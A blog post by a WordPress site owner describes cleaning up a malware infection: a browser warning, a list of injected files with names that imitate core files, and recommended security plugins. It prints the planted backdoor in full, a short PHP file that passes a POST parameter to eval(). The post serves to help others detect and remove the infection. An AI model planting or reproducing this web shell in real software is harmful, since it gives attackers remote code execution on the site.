Security issues created to WordPress installation

Received this warning in Google Chrome last night when i tried to open my website jogindernagar.com built in WordPress.

Warning: Something's Not Right Here!
www.jogindernagar.com contains malware. Your computer might catch a virus if you visit this site.

I immidiately tried some anti-virus and security plugins and found a reference to some non-familiar files on my server. (I stil wonder how were these files placed on my server.). The scan results showed reference to a non familiar file named wp-includes/wp-var.php. The php file ran an eval() script as shown below:

<?php
if (isset($_POST['wp-load'])) {
eval($_POST['wp-load']);
};
?>

I visited Google Webmaster Tool for more information and found 4 references to URL with malware. Here’s one:

http://www.jogindernagar.com/wp-count.php?ref=http%3A%2F%2Fwww.google.com%2Furl%3Fsa%3Dt%26rct%3Dj%26q%3Dhistory%252Bdistrict
%252Bjogindernagar%252Bhimachal%252Bpradesh%26source%3Dweb%26cd%3D4%26ved%3D0CCQQFjAA%26url
%3Dhttp%253A%252F%252Fwww.jogindernagar.com%252Ffeatured%252F%26ei%3Dp49QUPDJB-LX2wSktAE%26usg%3DAFQjCNFucH2b1qTgMGKeK0oO0PD8DF_nAA

Obviously, the wp-count.php was another php file created to support the malware. I did another manual comparison on WordPress files and found more non-wordpress files having eval() and un-friendly php code in them.

I thought this information may be helpful for someone trying to remove the similar malware infection and code injection breaches.

Complete list of malware files found on my server:
wp-includes/wp-var.php
wp-count.php
wp-apps.php
wp-register.php

Some helpful Security, Antivirus and Scanning plugins for WordPress:

Wordfence Security (it fixed all my issues)
Better WP Security
WP Security Scan
AntiVirus

I am submitting a review request to Google right now. Let’s hope everything is fine now.

Leave a Reply

Your email address will not be published.